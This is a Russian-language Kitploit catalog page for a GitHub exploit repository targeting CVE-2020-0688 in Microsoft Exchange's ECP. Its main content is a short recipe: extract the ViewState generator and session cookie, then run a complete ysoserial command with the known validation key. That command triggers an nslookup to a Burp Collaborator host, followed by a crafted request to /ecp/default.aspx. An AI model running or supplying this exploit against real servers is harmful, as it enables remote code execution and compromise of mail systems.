Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2020-0688 — cve-2020-0688 | Kitploit
Инструменты/GitHubGitHub/random-robbie/cve-2020-0688
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubrandom-robbie/cve-2020-0688

cve-2020-0688

cve-2020-0688

Репозиторий
163456 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

cve-2020-0688

cve-2020-0688

Вход с пользователем, у которого есть привилегия по адресу электронной почты, не о чем беспокоиться.

Извлеките - __VIEWSTATEGENERATOR из исходного кода страницы Извлеките - значение cookie ASP.NET_SessionId для значения viewstateuserkey

Скачать YSO здесь

root@kitploit:~
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "nslookup teasdas.myburpcollab.net" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug –islegacy

ПЕРЕЙДИТЕ К:

root@kitploit:~
https://localhost/ecp/default.aspx?__VIEWSTATEGENERATOR=<generator>&__VIEWSTATE=<ViewState>

Exploit.py не протестирован и требует демонстрационной системы для запуска и игры.

Скачать инструмент